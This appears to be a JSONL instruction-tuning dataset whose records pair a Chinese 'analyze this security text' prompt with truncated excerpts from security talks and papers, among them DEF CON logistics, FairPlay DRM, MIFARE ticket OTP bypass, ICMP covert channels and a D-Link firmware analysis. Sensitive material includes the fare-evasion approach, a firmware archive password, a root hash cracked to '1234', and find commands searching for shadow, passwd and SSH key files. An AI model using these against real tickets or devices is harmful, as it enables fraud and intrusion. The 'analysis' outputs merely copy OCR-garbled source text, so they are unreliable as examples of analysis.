{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nClosing(Ceremonies( 25th(Anniversary( Badges'Badges'Badges!' Andis(that(the(line(for(Swag?!( #badgelife( Swag!' Sold(out(again!( Thank(you(from(Swag(to(Speaker(Goons!( ( Transparency'  More(informaCon( about(DEF(CON( departments(and( whats(going(on.( Thanks'to'all'DEF'CON'Goons'  AdministraCon(  A(&(E(  Artwork(  Badges(  Contests/Events(  Demo(Labs(  Dispatch(  DC(Groups(  Forums(  Info/HackerTracker(  Inhuman(Reg(  OperaCons(  NOC(/(DCTV(  Press(  ProducCon(  QM(  RegistraCon(  Review(Board(  SOC(  Social(Media(  Speaker(Ops(  Swag(  Vendors(  Workshops( Old'and'New'Goons''Thank'You!' New,(reCring(Gold(Badge(Holders( Gold(Badge(Holders(of(the(past( New(Goons((n00ns( Hacker'Tracker'App' Android(and(iOS( Source(available(on(GitHub(-(h[ps://goo.gl/bbVRMt( Created(by(@shortstack(and(@sethlaw( Developed(by(@ChrisMays94(@MaceraMeg( Designed(by(@iMacHumphries( Network'OperaBons' Wired'Infrastructure'  Closed(CapConing(  Contests(  DC(TV(  Goons(  Media(Server(  Press(  Rootz(  Richard(Cheese(  SOMA(FM(  Speaker(Ops(  Speakers(  Vendors(  Villages(  WiFi(Monitoring( Wireless'Infrastructure' for(the(the(brave((and( patched(devices)( ( DC'TV' for(those(people(in(their( rooms( ( The(Network(  10(gbps(backbone(  200(250(mbps(internet(uplink(  Wired(  Firewall(-(FreeBSD(  1(x(Core(Cisco(Switch((#yolo(,(but(we(had(a(cold(stand-by(box)(  14(x(Edge(Cisco(Switches(  3(x(Monitoring(Servers(  2(x(DC(TV(Servers(  1(x(WiFi(RegistraCon(Server(  1(x(Admin(Server(  Media(Server( The(Network((cont)(  Wireless(  7210(Aruba(Controller(  61(Aruba(Access(Points((70,(105,(135,(225)(  69(Aruba(Access(Points((model(305)((THANKS(Aruba!(  DCTV(  13(ODROID(units(  2(x(on-site(streaming(servers(  Video(Transcoding(provided(by(SOK( The(Network((cont)( DC(TV(  HD(Broadcast(  2(Tracks(streamed(to(the(internetz(  5(channels(at(Caesars(  4(channels(for(each(remote(properCes( Timeline( Sunday' NOC(Setup( ( WiFi(APs(hanging/( patching( ( DC(TV(server(installs( ( DC(TV(oDroids( configuraCon( ( dctv.defcon.or", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFAIRPLAY DRM和混淆实现 0 1 DRM Fairplay - DRM 0 1 介绍 数字版权保护 应用于电子书籍/音乐/视频 App DRM自2013年引入 私有代码高度混淆 Fairplay - DRM 0 1 Load Command $ otool -l target | grep -i crypt cmd LC_ENCRYPTION_INFO_64 cryptoff 16384 cryptsize 4177920 cryptid 1 Fairplay - DRM 0 1 Fairplay Open - From Kernel Fairplay - DRM 0 1 Fairplay Open - MIG #include <mach/std_types.defs> #include <mach/mach_types.defs> subsystem KernelUser unfreed 502; type unk1_t = struct[136] of char; type unk2_t = struct[84] of char; routine fairplay_open( fairplay_port : mach_port_t; executable_path : pointer_t; cpu_type : uint32_t; cpu_subtype : uint32_t; out supf : pointer_t; out unk_ool2 : pointer_t; out unk1 : unk1_t; out unk2 : unk2_t; out supf_size : uint32_t; out ool2_size : uint32_t; out ukn3 : uint32_t); FairplayIOKit fairplayd Fairplay - DRM 0 1 Fairplay Open - fairplayd $ tree .  SC_Info   target.sinf   target.supf  target Fairplay - DRM 0 1 Fairplay Open - SINF $ sinf_view.py SC_Info/target.sinf sinf.frma: game sinf.schm: itun sinf.schi.user: 0xdeadbeef sinf.schi.key : 0x00000002 sinf.schi.iviv: <***16 bytes IV***> sinf.schi.righ.veID: 0x00012345 sinf.schi.righ.plat: 0x00000000 sinf.schi.righ.aver: 0x11223344 sinf.schi.righ.tran: 0x11223344 sinf.schi.righ.sing: 0x00000000 sinf.schi.righ.song: 0x11223344 sinf.schi.righ.tool: P550 sinf.schi.righ.medi: 0x00000080 sinf.schi.righ.mode: 0x00000000 sinf.schi.righ.hi32: 0x00000002 sinf.schi.name:<***null terminated username, 256 bytes***> sinf.schi.priv: <***432 bytes encrypted data***> sinf.sign: <***128 bytes signature***> Fairplay - DRM 0 1 Fairplay Open - SUPF $ supf_view.py SC_Info/target.supf KeyPair Segments: Segment 0x0: arm_v7, Keys: 0x3d0/4k, sha1sum = <code_sig> Segment 0x1: arm64, Keys: 0x3fc/4k, sha1sum = <code_sig> Fairplay Certificate: <RSA 1024 Ceritificate, valid since 2008, expire at 2013> RSA Signature: <128 bytes> Fairplay - DRM 0 1 Fairplay Open - QA时间 1. 使用了不安全的RSA密钥长度, 没有校验RSA证书的有效期 3. SINF中明文存储了用户身份标识信息(但是沙盒内无法读取) 4. 可以通过调用MIG + Hook来稳定获取Fairpla", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Survey and Examination of the Adequacy of the Laws Related to Cyber Warfare DONDI S. WEST* This paper argues that the current rules of war can address the emerging issues raised by cyber warfare. The author begins by giving a survey of the laws that have the biggest impact on cyber warfare. Next, the author discusses several popular issues that may have unnecessarily intensified the cyber warfare debate. The author then asserts the following five reasons why the U.S. should not enter into an international treaty for cyber warfare: (1) combatant commanders already have proper guidelines for conducting cyber warfare; (2) fields of law are seldom demarcated by technology; (3) an unintended consequence of a cyber warfare law is that it may pose an undue limitation on a primarily non-lethal strategic deterrence; (4) our adversaries are unlikely to comply; and (5) the rate of technology growth will outpace the ability for an international cyber regime to produce responsive policy, while the flexibility allotted by the UN Charter and laws of war are able to absorb technological advances. The author concludes that the current UN Charter and Laws of War should continue to govern cyber warfare and that creating an international treaty or law for cyber warfare would do more harm than good and seriously cripple our ability to conduct war. I. Introduction Immediately upon taking office, and in the midst of the worst economic downturn since the Great Depression, President Barack Obama ordered a 60-day clean-slate study to review the plans, programs, and activities related to cyber security (the 60-day Study).1 Although many people did not expect President Obama to enter the White House with cyber security as a * Dondi West is a Senior Cyber Intelligence and Policy Analyst at Booz Allen Hamilton and former U.S. Navy Information Warfare Officer. He holds a B.S. in Mathematics, a M.S. in Applied Information Technology, and a Juris Doctor degree from The University of Maryland Scho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDont Red Team AI like a Chump Ariel Herbert-Voss @adversariel Intro  Who am I?  What is this talk? A story about hacking an AI system IRL + + Key points in this talk (in case you zone out)  Focus on the threat model  Go for the jugular feature extraction process  Think about the data supply chain What is an AI system?  AI is a class of algorithms that we use to extract actionable information from data  AI is not new and the hype is real  In this talk, AI == ML AI Machine learning Deep learning What is an AI system? What is an AI system? data What is an AI system? data prediction What is an AI system? data prediction Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters data poisoning Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters data poisoning Adversarial examples adversarial example data point DOG FRIED CHICKEN (arbitrary) feature dimension 1 (arbitrary) feature dimension 2 target data point [Biggio et al, 2018] Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters backdoored function Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters model inversion Model inversion Image of Bill: *exists in training data set* Recovered image [Fredrikson et al, 2015] Parts of an AI system we can exploit  Data  Training/testing sets  Deployed environment data  Model  Algorithm  Parameters model theft Model theft data target model stolen model original predictions similar predictions [Tramèr et al, 2016] How to design an attack for an AI system 1. What model are you attacking? 2. Where do the data come from? 3. Where do the predictions go? Fooling AI-powered video surveillance  Com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBefore the FEDERAL COMMUNICATIONS COMMISSION Washington, D.C. 20554 In the Matters of Unlicensed Operation in the TV Broadcast Bands Additional Spectrum for Unlicensed Devices Below 900 MHz and in the 3 GHz Band ET Docket No. 04-186 ET Docket No. 02-380 REPLY COMMENTS OF DELL INC., GOOGLE, INC., THE HEWLETT-PACKARD CO., INTEL CORP., MICROSOFT CORP., AND PHILIPS ELECTRONICS NORTH AMERICA CORP. Scott Blake Harris Edmond J. Thomas S. Roberts Carter III Kelley A. Shields** HARRIS, WILTSHIRE & GRANNIS LLP 1200 Eighteenth Street, NW Washington, DC 20036 (202) 730-1300 March 2, 2007  Senior Policy Advisor ** Admitted only in Georgia; supervision by Scott Blake Harris, a member of the DC Bar, while DC Bar application pending. i Table of Contents SUMMARY ........................................................................................................................... ii I. THE COALITIONS PROPOSAL WILL ENABLE THE USE OF UNLICENSED LOW POWER DEVICES IN THE TV WHITE SPACES. ............................................................. 3 A. Technical and Operational Parameters.............................................................. 5 B. The Proposed Spectrum Sensing Approach Will Provide Broadcasters with the Protection to which they are Entitled. .......................................................... 8 1. The proposed detection threshold is more than sufficient to guard against harmful co-channel interference....................................................................... 9 2. Personal/portable devices can successfully operate in adjacent channels. ... 11 3. Low power television stations......................................................................... 14 C. Testing.................................................................................................................. 15 II. PERSONAL/PORTABLE DEVICES SHOULD BE AUTHORIZED AT THE SAME TIME AS FIXED DEVICES, IF NOT BEFORE....................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 序言 这些安全笔记是我用来学习和记录的帮助我补充知识里面大部分都有详细的描述以及复现过程这些内容包括红队攻防渗透测试代码审计和甲方安全建设等等知识内容与君共勉 相关链接 - [信息安全笔记中文版](https://icybersec.gitbook.io/cybersecuritynote-cn/) - [信息安全笔记英文版](https://icybersec.gitbook.io/cybersecuritynote-en/) - [GitHub仓库地址](https://github.com/yingshang/CybersecurityNote_cn) - [作者博客](https://www.freebuf.com/author/%E9%99%8C%E5%BA%A6) - 微信公众号陌度安全 {% hint style=\"danger\" %} 警告请勿将此处提及的任何工具用于非法不道德或有问题的目的这些工具仅用于合法/批准的测试和研究 {% endhint %}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOTP circumventing in MIFARE ULTRALIGHT: Who says free rides? bughardy bughardy@cryptolab.net Eagle1753 eagle1753@onenetbeyond.org Introduction RFID technologies are becoming more and more prevalent in our lives. This motivated us to study them, and in particular to study the MIFARE ULTRALIGHT chips, which are widely used in public/mass transport systems. We focused on multiple-ride tickets, and were surprised that MIFARE ULTRALIGHT chips do not seem to store any type of encrypted data. NFC chips should help transport company to prevent fraud and fake tickets but the scenario we are going to present shows a very different situation. In 2012 a security team from U.S.¹ found a bad implementation of transport ticket checking system. Each time a traveler made use of one of his ride, each ultralight card can store several rides, the system write the rides left on the DATA bytes of the ticket. It was enough to erase everything in data area to get a brand new ticket. After that several transport company started to use a security features of Mifare Ultralight ticket, OTP ( One-Time-Pad ) area. This area is composed o 32 bits. At the beginning each bit is set to zero, after each ride one bit is set to 1. In this area you can't turn bit back to zero. In this paper, and in the accompanying talk, we will discuss how bypass OTP features to gain again free rides using Mifare Ultralight transport tickets. And we will also show an easy script that displays ticket informations and help us to get free rides. ¹Corey Benninger and Max Sobell, security researchers at the Intrepidus Group MIFARE ULTRALIGHT Sectors Let's give a look to how a Mifare Ultralight chip is made. We have 5 sectors: Sector Memory UID  Ticket's serial number 9 bytes Internal byte, written by manufacturer 1 byte Lock bytes 2 bytes OTP bytes 4 bytes Data bytes 48 bytes In OTP sector all bits are set to 0 after production; if you want to write some bits in this area, they will be ORed with the existing, thus making im", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIncident Response Art, Science and Engineering Maarten Van Horenbeeck maarten@first.org  @maartenvhb  Director of Security Engineering at  Director and former Chairman of  Incident Responder. 你好 Ithaca, New York Population 30,513 1988 Morris worm The times, they are a-changing. Bob Dylan, 1964 FIRST.Org, Inc. All rights reserved. 7 Source: Traffic Signal Preemption in Millersville,PA by Wikipedia user Niagara An internet of Things 8 Internet users in percentage, UN Human Development Report 2014 (Google Data) An internet of People Art, science and engineering Dealing with complexity  Art:  Quality according to aesthetic principles of what is appealing  Science:  Branch of knowledge or study dealing with facts or truths showing general laws  Engineering:  Creating large structures using scientific methods  Art:  Quality according to aesthetic principles of what is appealing  Science:  Branch of knowledge or study dealing with facts or truths showing general laws  Engineering:  Creating large structures using scientific methods Our common history Lahore, Pakistan Population 5.143 million 1986 Pakistani Brain Hex dump of a Pakistani Brain infected floppy  by Avinash Meetoo (Wikipedia) Manila, Philipines Population 23 million 2000 LOVE-LETTER-FOR-YOU.txt.vbs 2007 Brussels, Belgium Population 1.2 million Targeted attacks Natanz, Iran 2010 Population 12,060 STUXNET .stub, mrxnet.sys Vulnerability in Windows Shell Design issue, previously used in Zlob DLL Preloading vulnerability Stuxnet Vulnerability in Task Scheduler Hash collision Vulnerability in Windows Shell Design issue, previously used in Zlob DLL Preloading vulnerability Stuxnet Vulnerability in Task Scheduler Hash collision Vulnerability in Windows Shell Design issue, previously used in Zlob Vulnerability in Win32k Memory corruption DLL Preloading vulnerability Stuxnet Vulnerability in Windows Shell Design issue, previously used in Zlob Vulnerability in Print Spooler Design issue Vulnerability in Win32k Memory cor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFax?! What The To: Date: Subject: Check Point Research DEFCON 26 Aug-12 2018 Received OK? WhoAreWe? Yaniv Balmas This should theoretically work Security Researcher Check Point Software Technologies @ynvb Eyal Itkin Thats cool. Security Researcher Check Point Software Technologies @eyalitkin 1860 Caselli Invents Machine Similar to Todays FAX 1923 Enter the RadioFAX. Used by Navies 1966 XEROX Introduces the First Commercial FAX Machine 1980 Group III ITU-T Fax Standards T.30, T.4, T.6 GammaFAX Brings Computers Into FAX Network 1985 1846 Alexaner Bain Sends An Image Over a Wire FAXHistory Quality Accessibility Reliability Authenticity ? BackToTheFuture BackToTheFuture BackToTheFuture BackToTheFuture BackToTheFuture BackToTheFuture WTF?!  Modern FAX is no longer a simple FAX Machines  The same old FAX technology is now wrapped inside newer technologies  ALL-IN-ONE printers are EVERYWHERE FaxToday The Security View ALL-IN-ONE Printers ALL-IN-ONE Printers FAX Attack ALL-IN-ONE Printers FAX Attack Challenge Accepted What is the Target? How to Obtain the Code? What is The OS? How Does FAX Even Work? How can we Debug it? Where to look for vulns? AndTheWinnerIs BreakingHW Flash ROM SRAMs (e.g Some More Memory) BreakingHW USB WiFi SRAM Electricity Main CPU FAX Modem Battery ShowMeYourFirmware! SERIAL DEBUG JTAG TooEasy? FirmwareUpgrade How do you upgrade a printer firmware?! You Print it! How do you upgrade a printer firmware?! You Print it! PrintingTheFirmware PrintingTheFirmware NULL Decoder TIFF Decoder Delta Raw Decoder WhenYoureaHammer Sections Loading Address Section Name Location in Binary IDontUnderstand  WhatISThis?!  Probably a compression algorithm  A very bad one   Some mathematics Let'sTakeALook FF 20 72 66 63 75 72 73 69 EF 76 65 6C 79 AE E0 6E 6F 6E DF 70 6F 73 69 74 FE 30 20 73 F7 69 7A 65 0E 32 76 61 72 69 FF 61 62 6C 65 2D 6C 65 6E F7 67 74 68 AD 33 00 00 56 4C FF 6A 70 65 67 2E r e c u r s i v e l y n o n p o s i t s i z e v a r i a b l e - l e n g t h V L j", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrlogin === 从当前终端登录到远程Linux主机 ## 补充说明 **rlogin命令** 用于从当前终端登录到远程Linux主机 ### 语法 ```shell rlogin(选项)(参数) ``` ### 选项 ```shell -8允许输入8位字符数据 -e脱离字符>设置脱离字符 -E滤除脱离字符 -l用户名称>指定要登入远端主机的用户名称 -L使用litout模式进行远端登入阶段操作 ``` ### 参数 远程主机指定要登录的远程主机ip地址或者域名", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前 言 Java 开发手册是阿里巴巴集团技术团队的集体智慧结晶和经验总结经历了多次大规模 一线实战的检验及不断完善公开到业界后众多社区开发者踊跃参与共同打磨完善系统化地 整理成册现代软件行业的高速发展对开发者的综合素质要求越来越高因为不仅是编程知识点 其它维度的知识点也会影响到软件的最终交付质量比如数据库的表结构和索引设计缺陷可能带 来软件上的架构缺陷或性能风险工程结构混乱导致后续维护艰难没有鉴权的漏洞代码易被黑客 攻击等等所以本手册以 Java 开发者为中心视角划分为编程规约异常日志单元测试安全规 约MySQL 数据库工程结构设计规约七个维度再根据内容特征细分成若干二级子目录 另外依据约束力强弱及故障敏感性规约依次分为强制推荐参考三大类在延伸信息中 说明对规约做了适当扩展和解释正例提倡什么样的编码和实现方式反例说明需要 提防的雷区以及真实的错误案例 手册的愿景是码出高效码出质量现代软件架构的复杂性需要协同开发完成如何高效地协 同呢无规矩不成方圆无规范难以协同比如制订交通法规表面上是要限制行车权实际上是 保障公众的人身安全试想如果没有限速没有红绿灯谁还敢上路行驶对软件来说适当的规 范和标准绝不是消灭代码内容的创造性优雅性而是限制过度个性化以一种普遍认可的统一方 式一起做事提升协作效率降低沟通成本代码的字里行间流淌的是软件系统的血液质量的提 升是尽可能少踩坑杜绝踩重复的坑切实提升系统稳定性码出质量 我们已经在 2017 杭州云栖大会上发布了配套的 Java 开发规约 IDE 插件阿里云效也集成了 代码规约扫描引擎次年发布 36 万字的配套详解图书码出高效本书秉持图胜于表表胜 于言的理念深入浅出地将计算机基础 面向对象思想JVM 探源数据结构与集合并发与 多线程单元测试等知识客观立体地呈现出来紧扣学以致用学以精进的目标结合阿里巴巴 实践经验和故障案例与底层源码解析融会贯通娓娓道来此书所得收入均捐赠公益事情希望 用技术情怀帮助更多的人 目录 前言 一编程规约 ................................................................................................................................................... 1 (一) 命名风格 ...................................................................................................................................... 1 (二) 常量定义 ...................................................................................................................................... 4 (三) 代码格式 ...................................................................................................................................... 5 (四) OOP 规约 .................................................................................................................................... 7 (五) 集合处理 ....................................................................................................................................11 (六) 并发处理 ....................................................................................................................................14 (七) 控制语句 ................................................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStealth Data Dispersion ICMP Moon-Bounce Saqib A. Khan, Principal khan@SecurityV.com Latest Version @ http://SecurityV.com/research Copyright 2002 Security Verification, Inc. All rights reserved. Definition Stealth Data Dispersal is an asynchronous covert channel Copyright 2002 Security Verification, Inc. All rights reserved. Project Goal Reside small amounts of data on the ether (within network traffic) rather than fixed physical storage. Copyright 2002 Security Verification, Inc. All rights reserved. Project Benefit Data becomes highly survivable in case of catastrophic failure/removal of Network Hosts Copyright 2002 Security Verification, Inc. All rights reserved. Preferred Embodiment  Dispersal of small amounts of data (< 1500 bytes = PPP MTU)  Data stays alive on the wire vs. a storage device, as long as possible  Data is retrieved or refreshed before data expires on the wire Copyright 2002 Security Verification, Inc. All rights reserved. Core TCP/IP Impediment TTL limits all TCP/IP packets to expire automatically after 255 hops! Packets which reach limit are automatically discarded Copyright 2002 Security Verification, Inc. All rights reserved. Candidate TCP/IP Protocols 1. ICMP (Inet Control Message Protocol)  Implementation required on all TCP/IP stacks  Echo Replies required to echo back original Request data  Universally available  Print servers, etc  Fair amount of ICMP traffic always present on the wire, ergo stealthy Copyright 2002 Security Verification, Inc. All rights reserved. Candidate TCP/IP Protocols 2. Multicast/IGMP (Inet Group Mgmt Protocol)  Designed for communicating between single Source to multiple Destinations (utilizing single transmission)  Very large amount of data can be found on the wire at any time (being used to broadcast numerous audio streams, etc), ergo very stealthy! Copyright 2002 Security Verification, Inc. All rights reserved. ICMP Moon-Bounce  Basic Operation: Bounce data between 2 Hosts utilizing an intermediary Victim Host", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n利用AI检测隐蔽的C2通信 AI for Detecting Covert C2 Communication 背景 0 1 C2技术发展 明文传输 加密混淆 公共协议(如TLS) 正常服务(如Twitter) 行业统计 2020年加密的C2通信已达70% Cisco 2020年Q167%的加密C2采用的TLS协议 WatchGuard 防的策略 0 2 检测手段 局限 签名特征 难以应对 加密载荷 统计规则 不精确 机器学习模型 鲁棒性低 过拟合 最具 前景 应用AI的难点 0 3 C2样本 1. 辨识度低 2. 数据量少 3. 特征维度少 4. 随机性强 Cisco的成功经验 0 4 TLS协议 TLS握手特征 Client Server Client Hello SSL/TLS version, supported ciphers, etc. Server Hello Cipher Suite(RSA, TLS1.0, etc.) Server Certificate Server Key Exchange(public key) [Client Certificate Request] Server Hello Done Client Key Exchange [Client Certificate] Certificate Verify 明文的密钥协商 深度协议伪装的C2 问题分析 0 5 差 异 网络数据包 网络会话流 通信信道 数据包载荷 数据包出现的顺序 反映出代码执行的流程  C2通信 正常通信 观察对象 分析思路 三点假设 Internet用户访问正常服务器和C&C服务器的差异 1.应用数据载荷主要传输的方向上的差异 2.服务器被有效访问频次的差异 3.用户数量的差异 0 6 从服务端 视角考虑 解决思路 0 7 以通信信道为观察对象 TLS通信信道{目的IP, 目的端口} 按通信信道聚合TLS流 验证假设 0 8 图 1 正负样本上/下行流量统计图 图 2 通信频次排名前100的对比图 图 3 连接服务器数排名前100的对比图 数据载荷传输方向上的差异 通信频次上的差异 用户数的差异 以通信信道为观察对象的统计对比 基于粒度计算的特征表示方法 0 9 图 1?统计值映射过程图 图 2 不同区间下的正负样本比例图 解决统计特征数值差异大的问题 基于粒度计算的特征表示方法 1 0 解决统计特征数值差异大的问题 图 1 统计值映射过程图 图 3 其他特征字段下的正负样本比例图 TLS信道特征工程 1 1 TLS流在信道上的分布特征设计 特征名 描述 特征数量 下行流载荷 以2,3,5,10,20,50,100,200,500,5000kB划分区间粒度 100 上行流载荷 以2,3,5,10,20,50,100,200,500,5000kB划分区间粒度 100 下/上行流量比 以2,3,5,10,20,50,100,200,500,5000kB划分区间粒度 100 连接频次 以2,3,5,10,20,50,100,200,500,5000划分区间粒度 100 连接设备数 以2,3,5,10,20,50,100,200,500,5000划分区间粒度 100 TLS信道特征工程 1 2 Web服务端兼容性 TLS握手 字段差异 Client Server Client Hello SSL/TLS version, supported ciphers, etc. Server Hello Cipher Suite(RSA, TLS1.0, etc.) Server Certificate Server Key Exchange(public key) [Client Certificate Request] Server Hello Done Client Key Exchange [Client Certificate] Certificate Verify 明文的密钥协商 握手字段 不一致 TLS信道特征工程 1 3 计算样本一致性比例 𝐶𝑜𝑛𝑠𝑖𝑠𝑡𝑒𝑛𝑐𝑦(𝐹) =.  012𝐶0(𝐹) 013 𝑁 TLS握手字段一致性统计 字段名称 正常信道 C2信道 客户端Hello长度 26.43% 57.63% 客户端HelloSession ID长度 41.11% 68.85% 加密算法数量 16.53% 63.70% 客户端Extension数量 27.68% 79.41% 客户端Session ticket长度 41.11% 68.86% 客户端交换密钥长度 28.86% 79.24% 客户端应用层协议协商长度 52.53% 89.73% 客户端签名算法个数 51.18% 86.44% 客户端签名算法 48.07%", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPen-Testing the Backbone Raven, NMRC raven@nmrc.org White box, black box?  Black box testing is good for external recon and data gathering.  However, it's far more difficult and likely to be destructive in implementation.  Many or most backbone vulnerabilites are denial- of-service oriented.  Since people get unhappy when you break their ISP, white-box testing is preferred. Initial Reconnaissance  Choose your target  search the registars for their address blocks, allocated autonomous systems, and other data. (Contacts if not role account, etc.)  Look on route servers and Internet maps to try to determine their peering.  Throw everything you get into Google, recurse when necessary to build a profile of the network.  Check mailing list archives for likely config details and public peering points. Vendor-specific details  Each vendor has their own advisory and vulnerability disclosure practices. Become familiar with these for each vendor on your target network.  Acquire CCO, Juniper, etc. site logins when necessary to supplement vulnerability information.  Don't forget the switches  this should go for all your network gear. Code train vulnerabilities  Check the vulnerabilities specific to each code train implemented in your network.  Also check vulnerabilities in stacks/implementations that your current code train is derived from. BSD stack vulnerabilities are worth checking for Cisco IOS and JunOS boxes, for example.  Some scanners incorporate these checks, but many may need to be done by hand. Beware of unintentional DoS while scanning. Failure paths and trust relationships  Architectural review  check for redunancy, network robustness, and security.  Do your authentication means have redundancy? Fallback? What is the weakest form of authentication one can force?  Once authenticated, is trust transitive? Can one log in directly from one backbone router to another? Are source IP addresses restricted?  Is there a single point of transit or authentication failure? What ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nScrew Being A Pentester - When I Grow Up I Want To Be A Bug Bounty Hunter Jake Kouns @jkouns Chief Information Security Officer (CISO) Risk Based Security Carsten Eiram @CarstenEiram Chief Research Officer (CRO) Risk Based Security N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Risk Based Security Community offerings: Commercial offerings: Information Security: Career Decisions N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices  Blue vs. Red! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y IT Security Career Choices  Red Team! N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester  Good Things About Red Teams N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Red Teams = Pentester N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester - Painful At Times? N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Pentester - Painful At Times? Also the option of becoming an independent pentester! Dont have to work for the man, but work time breakdown is roughly:  1/3 actual pentesting (fun)  1/3 administrative tasks and documentation  1/3 being a sales weazel (finding clients!) N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y N O T J U S T S E C U R I T Y , T H E R I G H T S E C U R I T Y Is There A Better Career Choice? N O T J U S T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Dlink_DWR-932B 路由器固件分析 <p align=\"center\"> <img src=\"../../../../../assets/img/banner/Dlink_DWR-932.jpg\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 获得固件 访问 Dlink 的 ftp 服务器 - ftp://ftp.dlink.eu/ 这里下载 DWR-932_fw_revB_2_02_eu_en_20150709.zip 文件 - ftp://ftp.dlink.eu/Products/dwr/dwr-932/driver_software/ --- ## 提取固件 解压,得到 DWR-932_B1_FW v.02.02EU.zip , 无法直接解压缩会发现该固件被加了密这是厂商对该固件做了保护防止逆向分析固件 可以用爆破工具爆破密码,这里省略这一步,解压密码是 beUT9Z 解压完毕,查看固件文件 有一些 yaffs2 格式的文件,这个需要用 [unyaffs](https://code.google.com/archive/p/unyaffs/downloads) 工具来提取,下载 unyaffs,配置权限,解压,查看解压的文件 ```bash mkdir test1 mv unyaffs test1 mv 2K-mdm-image-mdm9625.yaffs2 test1 cd test1 chmod +x unyaffs ./unyaffs 2K-mdm-image-mdm9625.yaffs2 ``` --- ## 信息挖掘 接下来,在提取的文件中挖掘一些有用的信息 ```bash find . -name \"*.conf\" find . -name \"shadow\" find . -name \"passwd\" find . -name \"*config*\" find . -name \"*history*\" find . -name \"*ssh*_config*\" find . -name \"*ssh_host*\" ``` 在 inadyn-mt.conf 这个文件中找到 no-ip 应用的配置 查看 shadow 文件 这里可以使用 hashcat 或 John the Ripper 爆破 root 账号的密码 ``` root:aRDiHrJ0OkehM:16270:0:99999:7::: ``` 可以看到 root 密码是 1234 --- 使用 firmwalker 工具来自动化遍历该固件系统中的所有可疑文件 ```bash git clone https://github.com/craigz28/firmwalker.git ./firmwalker.sh test1 ``` --- ## 查看启动项 ```bash cd etc/init.d ls -l total 252 -rwxr-xr-x 1 root root 2482 Sep 17 03:55 adbd -rwxr-xr-x 1 root root 250 Sep 17 03:55 alignment.sh -rwxr-xr-x 1 root root 4735 Sep 17 03:55 avahi-daemon -rwxr-xr-x 1 root root 4490 Sep 17 03:55 avahi-dnsconfd -rwxr-xr-x 1 root root 492 Sep 17 03:55 banner.sh -rwxr-xr-x 1 root root 1529 Sep 17 03:55 bootlogd -rwxr-xr-x 1 root root 1680 Sep 17 03:55 bootmisc.sh -rwxr-xr-x 1 root root 681 Sep 17 03:55 busybox-cron -rwxr-xr-x 1 root root 3229 Sep 17 03:55 checkroot.sh -rwxr-xr-x 1 root root 151 Sep 17 03:55 chgrp-diag -rwxr-xr-x 1 root root 1591 Sep 17 03:55 data-init -rwxr-xr-x 1 root root 2781 Sep 17 03:55 dbus-1 -rwxr-xr-x 1 root root 526 Sep 17 03:55 devpts.sh -rwxr-xr-x 1 root root 408 Sep 17 03:55 diagreb", "category": "text_analysis", "source": "security_papers"}
